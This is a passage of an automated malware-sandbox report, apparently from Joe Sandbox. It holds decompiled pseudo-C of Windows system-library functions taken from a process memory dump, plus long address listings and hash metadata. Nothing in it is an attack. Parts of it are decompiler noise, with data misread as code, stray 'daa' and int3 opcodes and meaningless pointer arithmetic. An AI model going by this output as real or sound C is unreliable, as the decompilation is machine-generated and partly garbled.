					_push(_t295);
					_t243 = _t241 +  *((intOrPtr*)(_t330 + 0x28)) +  *0x1f035126;
					_push(_t340);
					_t312 = _t311 +  *((intOrPtr*)(_t243 +  &_a1530200909));
					_push(_t340);
					_t244 = _t243 +  *_t312;
					 *((intOrPtr*)(_t295 + 3)) =  *((intOrPtr*)(_t295 + 3)) - _t312;
					 *_t244 =  *_t244 - 0x51;
					asm("daa");
					 *((intOrPtr*)(_t295 + 3)) =  *((intOrPtr*)(_t295 + 3)) - _t312;
					 *((intOrPtr*)(_t295 + 3)) =  *((intOrPtr*)(_t295 + 3)) - _t312;
					_t341 = _t295;
					asm("daa");
					_t286 = _t295;
					_push(_t341);
					_t335 = _t330 + _t330 - 1 +  *((intOrPtr*)(_t244 +  &_a1546912589));
					_push(_t341);
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					_push(0x20);
					_push(0x35bff00);
					E0353D08C(_t286, _t325, _t335);
					_v44 =  *[fs:0x18];
					_t326 = 0;
					 *_a24 = 0;
					_t287 = _a12;
					__eflags = _t287;
					if(_t287 == 0) {
						_t247 = 0xc0000100;
					} else {
						_v8 = 0;
						_t336 = 0xc0000100;
						_v52 = 0xc0000100;
						_t249 = 4;
						while(1) {
							_v40 = _t249;
							__eflags = _t249;
							if(_t249 == 0) {
								break;
							}
							_t301 = _t249 * 0xc;
							_v48 = _t301;
							__eflags = _t287 -  *((intOrPtr*)(_t301 + 0x34c1664));
							if(__eflags <= 0) {
								if(__eflags == 0) {
									_t264 = E0352E5C0(_a8,  *((intOrPtr*)(_t301 + 0x34c1668)), _t287);
									_t346 = _t346 + 0xc;
									__eflags = _t264;
									if(__eflags == 0) {
										_t336 = E035651BE(_t287,  *((intOrPtr*)(_v48 + 0x34c166c)), _a16, _t326, _t336, __eflags, _a20, _a24);
										_v52 = _t336;
										break;
									} else {
										_t249 = _v40;
										goto L62;
									}
									goto L70;
								} else {
									L62:
									_t249 = _t249 - 1;
									continue;
								}
							}
							break;
						}
						_v32 = _t336;
						__eflags = _t336;
						if(_t336 < 0) {
							__eflags = _t336 - 0xc0000100;
							if(_t336 == 0xc0000100) {
								_t297 = _a4;
								__eflags = _t297;
								if(_t297 != 0) {
									_v36 = _t297;
									__eflags =  *_t297 - _t326;
									if( *_t297 == _t326) {
										_t336 = 0xc0000100;
										goto L76;
									} else {
										_t314 =  *((intOrPtr*)(_v44 + 0x30));
										_t251 =  *((intOrPtr*)(_t314 + 0x10));
										__eflags =  *((intOrPtr*)(_t251 + 0x48)) - _t297;
										if( *((intOrPtr*)(_t251 + 0x48)) == _t297) {
											__eflags =  *(_t314 + 0x1c);
											if( *(_t314 + 0x1c) == 0) {
												L106:
												_t336 = E03512AE4( &_v36, _a8, _t287, _a16, _a20, _a24);
												_v32 = _t336;
												__eflags = _t336 - 0xc0000100;
												if(_t336 != 0xc0000100) {
													goto L69;
												} else {
													_t326 = 1;
													_t297 = _v36;
													goto L75;
												}
											} else {
												_t254 = E034F6600( *(_t314 + 0x1c));
												__eflags = _t254;
												if(_t254 != 0) {
													goto L106;
												} else {
													_t297 = _a4;
													goto L75;
												}
											}
										} else {
											L75:
											_t336 = E03512C50(_t297, _a8, _t287, _a16, _a20, _a24, _t326);
											L76:
											_v32 = _t336;
											goto L69;
										}
									}
									goto L108;
								} else {
									E034FEEF0( *((intOrPtr*)( *[fs:0x30] + 0x1c)));
									_v8 = 1;
									_v36 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_v44 + 0x30)) + 0x10)) + 0x48));
									_t336 = _a24;
									_t261 = E03512AE4( &_v36, _a8, _t287, _a16, _a20, _t336);
									_v32 = _t261;
									__eflags = _t261 - 0xc0000100;
									if(_t261 == 0xc0000100) {
										_v32 = E03512C50(_v36, _a8, _t287, _a16, _a20, _t336, 1);
									}
									_v8 = _t326;
									E03512ACB();
								}
							}
						}
						L69:
						_v8 = 0xfffffffe;
						_t247 = _t336;
					}
					L70:
					return E0353D0D1(_t247);
				}
				L108:
			}

























































                                  0x03512584
                                  0x03512586
                                  0x03512590
                                  0x03512596
                                  0x03512597
                                  0x03512598
                                  0x03512599
                                  0x0351259e
                                  0x035125a4
                                  0x035125a9
                                  0x035125ac
                                  0x035125ae
                                  0x035125b1
                                  0x035125b2
                                  0x035125b5
                                  0x035125b8
                                  0x035125bb
                                  0x035125bc
                                  0x035125bf
                                  0x035125c2
                                  0x035125c5
                                  0x035125c6
                                  0x035125cb
                                  0x035125ce
                                  0x035125d8
                                  0x035125dd
                                  0x035125de
                                  0x035125e1
                                  0x035125e3
                                  0x035125e9
                                  0x035126da
                                  0x035126da
                                  0x035126dd
                                  0x035126e2
                                  0x03555b56
                                  0x00000000
                                  0x035126e8
                                  0x035126f9
                                  0x035126fb
                                  0x035126fe
                                  0x03512700
                                  0x03555b60
                                  0x00000000
                                  0x03512706
                                  0x03512706
                                  0x0351270a
                                  0x0351270a
                                  0x0351270d
                                  0x03512713
                                  0x03512716
                                  0x03512718
                                  0x0351271c
                                  0x0351271e
                                  0x03555b6c
                                  0x03555b6f
                                  0x03555b7f
                                  0x03555b89
                                  0x03555b8e
                                  0x03555b93
                                  0x03555b96
                                  0x03555b9c
                                  0x03555ba0
                                  0x03555ba3
                                  0x03555bab
                                  0x03555bb0
                                  0x03555bb3
                                  0x03555bb3
                                  0x03555ba3
                                  0x03512724
                                  0x03512726
                                  0x03512729
                                  0x0351272c
                                  0x0351279d
                                  0x0351279d
                                  0x035127a0
                                  0x035127a2
                                  0x00000000
                                  0x0351272e
                                  0x0351272e
                                  0x03512731
                                  0x03512734
                                  0x03512734
                                  0x03512736
                                  0x03555bc1
                                  0x03555bc1
                                  0x03555bc4
                                  0x00000000
                                  0x03555bca
                                  0x03555bca
                                  0x03555bcd
                                  0x00000000
                                  0x03555bd3
                                  0x00000000
                                  0x03555bd3
                                  0x03555bcd
                                  0x0351273c
                                  0x0351273c
                                  0x03512742
                                  0x03512747
                                  0x0351274a
                                  0x0351274d
                                  0x03512750
                                  0x00000000
                                  0x03512756
                                  0x03512756
                                  0x00000000
                                  0x03512902
                                  0x03512908
                                  0x0351290b
                                  0x00000000
                                  0x03512911
                                  0x0351291c
                                  0x03512921
                                  0x00000000
                                  0x03512921
                                  0x00000000
                                  0x00000000
                                  0x03512880
                                  0x03512887
                                  0x0351288c
                                  0x00000000
                                  0x00000000
                                  0x03512805
                                  0x0351280a
                                  0x03512814
                                  0x03512816
                                  0x00000000
                                  0x00000000
                                  0x0351281e
                                  0x03512821
                                  0x03512823
                                  0x00000000
                                  0x03512829
                                  0x03512829
                                  0x03512831
                                  0x0351283c
                                  0x0351283e
                                  0x00000000
                                  0x0351283e
                                  0x00000000
                                  0x00000000
                                  0x0351284e
                                  0x03512850
                                  0x03512851
                                  0x03512854
                                  0x03512857
                                  0x0351285a
                                  0x0351285c
                                  0x0351285d
                                  0x00000000
                                  0x00000000
                                  0x0351275d
                                  0x03512761
                                  0x00000000
                                  0x03512767
                                  0x0351276e
                                  0x03512773
                                  0x03512773
                                  0x03512776
                                  0x03512778
                                  0x0351277e
                                  0x0351277e
                                  0x03512781
                                  0x03512781
                                  0x03512783
                                  0x03512784
                                  0x00000000
                                  0x00000000
                                  0x03555bd8
                                  0x03555bde
                                  0x03555be4
                                  0x03555be6
                                  0x03555be8
                                  0x03555be9
                                  0x03555bee
                                  0x03555bf8
                                  0x03555bff
                                  0x03555c01
                                  0x03555c04
                                  0x03555c07
                                  0x03555c0b
                                  0x03555c0d
                                  0x03555c0d
                                  0x03555c15
                                  0x03555c18
                                  0x03555c1b
                                  0x03555c1b
                                  0x03555c1e
                                  0x00000000
                                  0x00000000
                                  0x035128c3
                                  0x035128c8
                                  0x035128d2
                                  0x035128d4
                                  0x035128d8
                                  0x035128db
                                  0x03555c26
                                  0x03555c28
                                  0x03555c2d
                                  0x03555c2d
                                  0x00000000
                                  0x00000000
                                  0x03555c34
                                  0x03555c36
                                  0x03555c49
                                  0x03555c4e
                                  0x03555c54
                                  0x03555c5b
                                  0x03555c5d
                                  0x03555c60
                                  0x03512788
                                  0x03512788
                                  0x0351278b
                                  0x0351278e
                                  0x0351278e
                                  0x0351278e
                                  0x03512791
                                  0x00000000
                                  0x00000000
                                  0x03512756
                                  0x03512750
                                  0x00000000
                                  0x03512794
                                  0x03512794
                                  0x03512795
                                  0x03512798
                                  0x03512798
                                  0x00000000
                                  0x03512734
                                  0x0351272c
                                  0x03512700
                                  0x035125ef
                                  0x035125ef
                                  0x035125ef
                                  0x035125f2
                                  0x035125f8
                                  0x00000000
                                  0x00000000
                                  0x035125fe
                                  0x00000000
                                  0x035128e6
                                  0x035128ec
                                  0x035128ef
                                  0x035128f5
                                  0x035128f8
                                  0x035128f8
                                  0x00000000
                                  0x035128f8
                                  0x00000000
                                  0x00000000
                                  0x03512866
                                  0x03512866
                                  0x03512876
                                  0x03512879
                                  0x00000000
                                  0x00000000
                                  0x035127e0
                                  0x035127e7
                                  0x035127e9
                                  0x035127eb
                                  0x03555afd
                                  0x00000000
                                  0x03555afd
                                  0x00000000
                                  0x00000000
                                  0x03512633
                                  0x03512638
                                  0x0351263b
                                  0x0351263c
                                  0x0351263e
                                  0x03512640
                                  0x03512642
                                  0x03512647
                                  0x03512649
                                  0x0351264e
                                  0x03512650
                                  0x03512653
                                  0x03512659
                                  0x035126a2
                                  0x035126a7
                                  0x035126ac
                                  0x035126b2
                                  0x03555b11
                                  0x03555b15
                                  0x03555b17
                                  0x00000000
                                  0x035126b8
                                  0x035126b8
                                  0x035126ba
                                  0x035127a6
                                  0x035127a6
                                  0x035127a9
                                  0x035127ab
                                  0x035127b9
                                  0x035127b9
                                  0x035127be
                                  0x035127c1
                                  0x035127c3
                                  0x035127c5
                                  0x035127c7
                                  0x03555c74
                                  0x03555c79
                                  0x03555c79
                                  0x035127c7
                                  0x00000000
                                  0x035126c0
                                  0x035126c0
                                  0x035126c3
                                  0x035126c6
                                  0x035126c6
                                  0x035126c9
                                  0x035126c9
                                  0x00000000
                                  0x035126c9
                                  0x035126ba
                                  0x0351265b
                                  0x0351265b
                                  0x0351265e
                                  0x03512667
                                  0x0351266d
                                  0x03512677
                                  0x0351267c
                                  0x0351267f
                                  0x03512681
                                  0x03555b49
                                  0x03555b4e
                                  0x035127cd
                                  0x035127d0
                                  0x035127d1
                                  0x035127d2
                                  0x035127d4
                                  0x035127dd
                                  0x03512687
                                  0x03512687
                                  0x0351268a
                                  0x0351268b
                                  0x0351268e
                                  0x0351268f
                                  0x03512691
                                  0x03512696
                                  0x03512698
                                  0x0351269d
                                  0x0351269f
                                  0x00000000
                                  0x0351269f
                                  0x03512681
                                  0x00000000
                                  0x00000000
                                  0x03512846
                                  0x00000000
                                  0x00000000
                                  0x03512605
                                  0x0351260a
                                  0x0351260c
                                  0x03512611
                                  0x03512616
                                  0x03512619
                                  0x03512619
                                  0x0351261e
                                  0x00000000
                                  0x03512624
                                  0x03512627
                                  0x03512627
                                  0x00000000
                                  0x00000000
                                  0x03555b1f
                                  0x00000000
                                  0x00000000
                                  0x03512894
                                  0x0351289b
                                  0x0351289d
                                  0x035128a1
                                  0x03555b2b
                                  0x03555b2e
                                  0x03555b2e
                                  0x035128a7
                                  0x035128a9
                                  0x03555b04
                                  0x03555b09
                                  0x03555b09
                                  0x03555b09
                                  0x00000000
                                  0x00000000
                                  0x03555b35
                                  0x03555b3c
                                  0x035128fb
                                  0x035128fb
                                  0x035126cc
                                  0x035126cc
                                  0x035126d0
                                  0x00000000
                                  0x035126d2
                                  0x035126d2
                                  0x00000000
                                  0x035126d2
                                  0x00000000
                                  0x00000000
                                  0x035125fe
                                  0x0351292d
                                  0x0351292f
                                  0x03512930
                                  0x03512935
                                  0x03512937
                                  0x0351293b
                                  0x0351293c
                                  0x0351293e
                                  0x0351293f
                                  0x03512940
                                  0x03512942
                                  0x03512947
                                  0x03512948
                                  0x0351294f
                                  0x03512950
                                  0x03512957
                                  0x03512958
                                  0x0351295a
                                  0x0351295d
                                  0x03512962
                                  0x03512966
                                  0x0351296a
                                  0x0351296d
                                  0x0351296e
                                  0x03512972
                                  0x03512973
                                  0x03512974
                                  0x0351297b
                                  0x0351297e
                                  0x0351297f
                                  0x03512980
                                  0x03512981
                                  0x03512982
                                  0x03512983
                                  0x03512984
                                  0x03512985
                                  0x03512986
                                  0x03512987
                                  0x03512988
                                  0x03512989
                                  0x0351298a
                                  0x0351298b
                                  0x0351298c
                                  0x0351298d
                                  0x0351298e
                                  0x0351298f
                                  0x03512990
                                  0x03512992
                                  0x03512997
                                  0x035129a3
                                  0x035129a6
                                  0x035129ab
                                  0x035129ad
                                  0x035129b0
                                  0x035129b2
                                  0x03555c80
                                  0x035129b8
                                  0x035129b8
                                  0x035129bb
                                  0x035129c0
                                  0x035129c5
                                  0x035129c6
                                  0x035129c6
                                  0x035129c9
                                  0x035129cb
                                  0x00000000
                                  0x00000000
                                  0x035129cd
                                  0x035129d0
                                  0x035129d9
                                  0x035129db
                                  0x035129dd
                                  0x03512a7f
                                  0x03512a84
                                  0x03512a87
                                  0x03512a89
                                  0x03555ca1
                                  0x03555ca3
                                  0x00000000
                                  0x03512a8f
                                  0x03512a8f
                                  0x00000000
                                  0x03512a8f
                                  0x00000000
                                  0x035129e3
                                  0x035129e3
                                  0x035129e3
                                  0x00000000
                                  0x035129e3
                                  0x035129dd
                                  0x00000000
                                  0x035129db
                                  0x035129e6
                                  0x035129e9
                                  0x035129eb
                                  0x035129ed
                                  0x035129f3
                                  0x035129f5
                                  0x035129f8
                                  0x035129fa
                                  0x03512a97
                                  0x03512a9a
                                  0x03512a9d
                                  0x03512add
                                  0x00000000
                                  0x03512a9f
                                  0x03512aa2
                                  0x03512aa5
                                  0x03512aa8
                                  0x03512aab
                                  0x03555cab
                                  0x03555caf
                                  0x03555cc5
                                  0x03555cda
                                  0x03555cdc
                                  0x03555cdf
                                  0x03555ce5
                                  0x00000000
                                  0x03555ceb
                                  0x03555ced
                                  0x03555cee
                                  0x00000000
                                  0x03555cee
                                  0x03555cb1
                                  0x03555cb4
                                  0x03555cb9
                                  0x03555cbb
                                  0x00000000
                                  0x03555cbd
                                  0x03555cbd
                                  0x00000000
                                  0x03555cbd
                                  0x03555cbb
                                  0x03512ab1
                                  0x03512ab1
                                  0x03512ac4
                                  0x03512ac6
                                  0x03512ac6
                                  0x00000000
                                  0x03512ac6
                                  0x03512aab
                                  0x00000000
                                  0x03512a00
                                  0x03512a09
                                  0x03512a0e
                                  0x03512a21
                                  0x03512a24
                                  0x03512a35
                                  0x03512a3a
                                  0x03512a3d
                                  0x03512a42
                                  0x03512a59
                                  0x03512a59
                                  0x03512a5c
                                  0x03512a5f
                                  0x03512a5f
                                  0x035129fa
                                  0x035129f3
                                  0x03512a64
                                  0x03512a64
                                  0x03512a6b
                                  0x03512a6b
                                  0x03512a6d
                                  0x03512a72
                                  0x03512a72
                                  0x00000000

                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000013.00000002.981500601.00000000034C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 034C0000, based on PE: true
                                  • Associated: 00000013.00000002.981748738.00000000035DB000.00000040.00000800.00020000.00000000.sdmpDownload File
                                  • Associated: 00000013.00000002.981764982.00000000035DF000.00000040.00000800.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_19_2_34c0000_wlanext.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: PATH
                                  • API String ID: 0-1036084923
                                  • Opcode ID: 99febf42a840eb0aaad79753bc912fd1eb623051faa8f7f26a14a3776ef22d62
                                  • Instruction ID: 16ce71e752e845cf803186ddf42a3b3d1caf56238d37349943856bba6d0aa109
                                  • Opcode Fuzzy Hash: 99febf42a840eb0aaad79753bc912fd1eb623051faa8f7f26a14a3776ef22d62
                                  • Instruction Fuzzy Hash: 06C19575D10219DFDB24DF99E880BBEB7B5FF49710F084819E801AB2B0D734A955CBA0
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0351FAB0 Relevance: 1.6, Strings: 1, Instructions: 306COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 80%
                                  			E0351FAB0(void* __ebx, void* __esi, signed int _a8, signed int _a12) {
				char _v5;
				signed int _v8;
				signed int _v12;
				char _v16;
				char _v17;
				char _v20;
				signed int _v24;
				char _v28;
				char _v32;
				signed int _v40;
				void* __ecx;
				void* __edi;
				void* __ebp;
				signed int _t73;
				intOrPtr* _t75;
				signed int _t77;
				signed int _t79;
				signed int _t81;
				intOrPtr _t83;
				intOrPtr _t85;
				intOrPtr _t86;
				signed int _t91;
				signed int _t94;
				signed int _t95;
				signed int _t96;
				signed int _t106;
				signed int _t108;
				signed int _t114;
				signed int _t116;
				signed int _t118;
				signed int _t122;
				signed int _t123;
				void* _t129;
				signed int _t130;
				void* _t132;
				intOrPtr* _t134;
				signed int _t138;
				signed int _t141;
				signed int _t147;
				intOrPtr _t153;
				signed int _t154;
				signed int _t155;
				signed int _t170;
				void* _t174;
				signed int _t176;
				signed int _t177;

				_t129 = __ebx;
				_push(_t132);
				_push(__esi);
				_t174 = _t132;
				_t73 =  !( *( *(_t174 + 0x18)));
				if(_t73 >= 0) {
					L5:
					return _t73;
				} else {
					E034FEEF0(0x35d7b60);
					_t134 =  *0x35d7b84; // 0x771c7b80
					_t2 = _t174 + 0x24; // 0x24
					_t75 = _t2;
					if( *_t134 != 0x35d7b80) {
						_push(3);
						asm("int 0x29");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						_push(0x35d7b60);
						_t170 = _v8;
						_v28 = 0;
						_v40 = 0;
						_v24 = 0;
						_v17 = 0;
						_v32 = 0;
						__eflags = _t170 & 0xffff7cf2;
						if((_t170 & 0xffff7cf2) != 0) {
							L43:
							_t77 = 0xc000000d;
						} else {
							_t79 = _t170 & 0x0000000c;
							__eflags = _t79;
							if(_t79 != 0) {
								__eflags = _t79 - 0xc;
								if(_t79 == 0xc) {
									goto L43;
								} else {
									goto L9;
								}
							} else {
								_t170 = _t170 | 0x00000008;
								__eflags = _t170;
								L9:
								_t81 = _t170 & 0x00000300;
								__eflags = _t81 - 0x300;
								if(_t81 == 0x300) {
									goto L43;
								} else {
									_t138 = _t170 & 0x00000001;
									__eflags = _t138;
									_v24 = _t138;
									if(_t138 != 0) {
										__eflags = _t81;
										if(_t81 != 0) {
											goto L43;
										} else {
											goto L11;
										}
									} else {
										L11:
										_push(_t129);
										_t77 = E034F6D90( &_v20);
										_t130 = _t77;
										__eflags = _t130;
										if(_t130 >= 0) {
											_push(_t174);
											__eflags = _t170 & 0x00000301;
											if((_t170 & 0x00000301) == 0) {
												_t176 = _a8;
												__eflags = _t176;
												if(__eflags == 0) {
													L64:
													_t83 =  *[fs:0x18];
													_t177 = 0;
													__eflags =  *(_t83 + 0xfb8);
													if( *(_t83 + 0xfb8) != 0) {
														E034F76E2( *((intOrPtr*)( *[fs:0x18] + 0xfb8)));
														 *((intOrPtr*)( *[fs:0x18] + 0xfb8)) = 0;
													}
													 *((intOrPtr*)( *[fs:0x18] + 0xfb8)) = _v12;
													goto L15;
												} else {
													asm("sbb edx, edx");
													_t114 = E03588938(_t130, _t176, ( ~(_t170 & 4) & 0xffffffaf) + 0x55, _t170, _t176, __eflags);
													__eflags = _t114;
													if(_t114 < 0) {
														_push("*** ASSERT FAILED: Input parameter LanguagesBuffer for function RtlSetThreadPreferredUILanguages is not a valid multi-string!\n");
														E034EB150();
													}
													_t116 = E03586D81(_t176,  &_v16);
													__eflags = _t116;
													if(_t116 >= 0) {
														__eflags = _v16 - 2;
														if(_v16 < 2) {
															L56:
															_t118 = E034F75CE(_v20, 5, 0);
															__eflags = _t118;
															if(_t118 < 0) {
																L67:
																_t130 = 0xc0000017;
																goto L32;
															} else {
																__eflags = _v12;
																if(_v12 == 0) {
																	goto L67;
																} else {
																	_t153 =  *0x35d8638; // 0x0
																	_t122 = L034F38A4(_t153, _t176, _v16, _t170 | 0x00000002, 0x1a, 5,  &_v12);
																	_t154 = _v12;
																	_t130 = _t122;
																	__eflags = _t130;
																	if(_t130 >= 0) {
																		_t123 =  *(_t154 + 4) & 0x0000ffff;
																		__eflags = _t123;
																		if(_t123 != 0) {
																			_t155 = _a12;
																			__eflags = _t155;
																			if(_t155 != 0) {
																				 *_t155 = _t123;
																			}
																			goto L64;
																		} else {
																			E034F76E2(_t154);
																			goto L41;
																		}
																	} else {
																		E034F76E2(_t154);
																		_t177 = 0;
																		goto L18;
																	}
																}
															}
														} else {
															__eflags =  *_t176;
															if( *_t176 != 0) {
																goto L56;
															} else {
																__eflags =  *(_t176 + 2);
																if( *(_t176 + 2) == 0) {
																	goto L64;
																} else {
																	goto L56;
																}
															}
														}
													} else {
														_t130 = 0xc000000d;
														goto L32;
													}
												}
												goto L35;
											} else {
												__eflags = _a8;
												if(_a8 != 0) {
													_t77 = 0xc000000d;
												} else {
													_v5 = 1;
													L0351FCE3(_v20, _t170);
													_t177 = 0;
													__eflags = 0;
													L15:
													_t85 =  *[fs:0x18];
													__eflags =  *((intOrPtr*)(_t85 + 0xfc0)) - _t177;
													if( *((intOrPtr*)(_t85 + 0xfc0)) == _t177) {
														L18:
														__eflags = _t130;
														if(_t130 != 0) {
															goto L32;
														} else {
															__eflags = _v5 - _t130;
															if(_v5 == _t130) {
																goto L32;
															} else {
																_t86 =  *[fs:0x18];
																__eflags =  *((intOrPtr*)(_t86 + 0xfbc)) - _t177;
																if( *((intOrPtr*)(_t86 + 0xfbc)) != _t177) {
																	_t177 =  *( *( *[fs:0x18] + 0xfbc));
																}
																__eflags = _t177;
																if(_t177 == 0) {
																	L31:
																	__eflags = 0;
																	L034F70F0(_t170 | 0x00000030,  &_v32, 0,  &_v28);
																	goto L32;
																} else {
																	__eflags = _v24;
																	_t91 =  *(_t177 + 0x20);
																	if(_v24 != 0) {
																		 *(_t177 + 0x20) = _t91 & 0xfffffff9;
																		goto L31;
																	} else {
																		_t141 = _t91 & 0x00000040;
																		__eflags = _t170 & 0x00000100;
																		if((_t170 & 0x00000100) == 0) {
																			__eflags = _t141;
																			if(_t141 == 0) {
																				L74:
																				_t94 = _t91 & 0xfffffffd | 0x00000004;
																				goto L27;
																			} else {
																				_t177 = E0351FD22(_t177);
																				__eflags = _t177;
																				if(_t177 == 0) {
																					goto L42;
																				} else {
																					_t130 = E0351FD9B(_t177, 0, 4);
																					__eflags = _t130;
																					if(_t130 != 0) {
																						goto L42;
																					} else {
																						_t68 = _t177 + 0x20;
																						 *_t68 =  *(_t177 + 0x20) & 0xffffffbf;
																						__eflags =  *_t68;
																						_t91 =  *(_t177 + 0x20);
																						goto L74;
																					}
																				}
																			}
																			goto L35;
																		} else {
																			__eflags = _t141;
																			if(_t141 != 0) {
																				_t177 = E0351FD22(_t177);
																				__eflags = _t177;
																				if(_t177 == 0) {
																					L42:
																					_t77 = 0xc0000001;
																					goto L33;
																				} else {
																					_t130 = E0351FD9B(_t177, 0, 4);
																					__eflags = _t130;
																					if(_t130 != 0) {
																						goto L42;
																					} else {
																						 *(_t177 + 0x20) =  *(_t177 + 0x20) & 0xffffffbf;
																						_t91 =  *(_t177 + 0x20);
																						goto L26;
																					}
																				}
																				goto L35;
																			} else {
																				L26:
																				_t94 = _t91 & 0xfffffffb | 0x00000002;
																				__eflags = _t94;
																				L27:
																				 *(_t177 + 0x20) = _t94;
																				__eflags = _t170 & 0x00008000;
																				if((_t170 & 0x00008000) != 0) {
																					_t95 = _a12;
																					__eflags = _t95;
																					if(_t95 != 0) {
																						_t96 =  *_t95;
																						__eflags = _t96;
																						if(_t96 != 0) {
																							 *((short*)(_t177 + 0x22)) = 0;
																							_t40 = _t177 + 0x20;
																							 *_t40 =  *(_t177 + 0x20) | _t96 << 0x00000010;
																							__eflags =  *_t40;
																						}
																					}
																				}
																				goto L31;
																			}
																		}
																	}
																}
															}
														}
													} else {
														_t147 =  *( *[fs:0x18] + 0xfc0);
														_t106 =  *(_t147 + 0x20);
														__eflags = _t106 & 0x00000040;
														if((_t106 & 0x00000040) != 0) {
															_t147 = E0351FD22(_t147);
															__eflags = _t147;
															if(_t147 == 0) {
																L41:
																_t130 = 0xc0000001;
																L32:
																_t77 = _t130;
																goto L33;
															} else {
																 *(_t147 + 0x20) =  *(_t147 + 0x20) & 0xffffffbf;
																_t106 =  *(_t147 + 0x20);
																goto L17;
															}
															goto L35;
														} else {
															L17:
															_t108 = _t106 | 0x00000080;
															__eflags = _t108;
															 *(_t147 + 0x20) = _t108;
															 *( *[fs:0x18] + 0xfc0) = _t147;
															goto L18;
														}
													}
												}
											}
											L33:
										}
									}
								}
							}
						}
						L35:
						return _t77;
					} else {
						 *_t75 = 0x35d7b80;
						 *((intOrPtr*)(_t75 + 4)) = _t134;
						 *_t134 = _t75;
						 *0x35d7b84 = _t75;
						_t73 = E034FEB70(_t134, 0x35d7b60);
						if( *0x35d7b20 != 0) {
							_t73 =  *( *[fs:0x30] + 0xc);
							if( *((char*)(_t73 + 0x28)) == 0) {
								_t73 = E034FFF60( *0x35d7b20);
							}
						}
						goto L5;
					}
				}
			}

















































                                  0x0351fab0
                                  0x0351fab2
                                  0x0351fab3
                                  0x0351fab4
                                  0x0351fabc
                                  0x0351fac0
                                  0x0351fb14
                                  0x0351fb17
                                  0x0351fac2
                                  0x0351fac8
                                  0x0351facd
                                  0x0351fad3
                                  0x0351fad3
                                  0x0351fadd
                                  0x0351fb18
                                  0x0351fb1b
                                  0x0351fb1d
                                  0x0351fb1e
                                  0x0351fb1f
                                  0x0351fb20
                                  0x0351fb21
                                  0x0351fb22
                                  0x0351fb23
                                  0x0351fb24
                                  0x0351fb25
                                  0x0351fb26
                                  0x0351fb27
                                  0x0351fb28
                                  0x0351fb29
                                  0x0351fb2a
                                  0x0351fb2b
                                  0x0351fb2c
                                  0x0351fb2d
                                  0x0351fb2e
                                  0x0351fb2f
                                  0x0351fb3a
                                  0x0351fb3b
                                  0x0351fb3e
                                  0x0351fb41
                                  0x0351fb44
                                  0x0351fb47
                                  0x0351fb4a
                                  0x0351fb4d
                                  0x0351fb53
                                  0x0355bdcb
                                  0x0355bdcb
                                  0x0351fb59
                                  0x0351fb5b
                                  0x0351fb5b
                                  0x0351fb5e
                                  0x0355bdd5
                                  0x0355bdd8
                                  0x00000000
                                  0x0355bdda
                                  0x00000000
                                  0x0355bdda
                                  0x0351fb64
                                  0x0351fb64
                                  0x0351fb64
                                  0x0351fb67
                                  0x0351fb6e
                                  0x0351fb70
                                  0x0351fb72
                                  0x00000000
                                  0x0351fb78
                                  0x0351fb7a
                                  0x0351fb7a
                                  0x0351fb7d
                                  0x0351fb80
                                  0x0355bddf
                                  0x0355bde1
                                  0x00000000
                                  0x0355bde3
                                  0x00000000
                                  0x0355bde3
                                  0x0351fb86
                                  0x0351fb86
                                  0x0351fb86
                                  0x0351fb8b
                                  0x0351fb90
                                  0x0351fb92
                                  0x0351fb94
                                  0x0351fb9a
                                  0x0351fb9b
                                  0x0351fba1
                                  0x0355bde8
                                  0x0355bdeb
                                  0x0355bded
                                  0x0355beb5
                                  0x0355beb5
                                  0x0355bebb
                                  0x0355bebd
                                  0x0355bec3
                                  0x0355bed2
                                  0x0355bedd
                                  0x0355bedd
                                  0x0355beed
                                  0x00000000
                                  0x0355bdf3
                                  0x0355bdfe
                                  0x0355be06
                                  0x0355be0b
                                  0x0355be0d
                                  0x0355be0f
                                  0x0355be14
                                  0x0355be19
                                  0x0355be20
                                  0x0355be25
                                  0x0355be27
                                  0x0355be35
                                  0x0355be39
                                  0x0355be46
                                  0x0355be4f
                                  0x0355be54
                                  0x0355be56
                                  0x0355bef8
                                  0x0355bef8
                                  0x00000000
                                  0x0355be5c
                                  0x0355be5c
                                  0x0355be60
                                  0x00000000
                                  0x0355be66
                                  0x0355be66
                                  0x0355be7f
                                  0x0355be84
                                  0x0355be87
                                  0x0355be89
                                  0x0355be8b
                                  0x0355be99
                                  0x0355be9d
                                  0x0355bea0
                                  0x0355beac
                                  0x0355beaf
                                  0x0355beb1
                                  0x0355beb3
                                  0x0355beb3
                                  0x00000000
                                  0x0355bea2
                                  0x0355bea2
                                  0x00000000
                                  0x0355bea2
                                  0x0355be8d
                                  0x0355be8d
                                  0x0355be92
                                  0x00000000
                                  0x0355be92
                                  0x0355be8b
                                  0x0355be60
                                  0x0355be3b
                                  0x0355be3b
                                  0x0355be3e
                                  0x00000000
                                  0x0355be40
                                  0x0355be40
                                  0x0355be44
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x0355be44
                                  0x0355be3e
                                  0x0355be29
                                  0x0355be29
                                  0x00000000
                                  0x0355be29
                                  0x0355be27
                                  0x00000000
                                  0x0351fba7
                                  0x0351fba7
                                  0x0351fbab
                                  0x0355bf02
                                  0x0351fbb1
                                  0x0351fbb1
                                  0x0351fbb8
                                  0x0351fbbd
                                  0x0351fbbd
                                  0x0351fbbf
                                  0x0351fbbf
                                  0x0351fbc5
                                  0x0351fbcb
                                  0x0351fbf8
                                  0x0351fbf8
                                  0x0351fbfa
                                  0x00000000
                                  0x0351fc00
                                  0x0351fc00
                                  0x0351fc03
                                  0x00000000
                                  0x0351fc09
                                  0x0351fc09
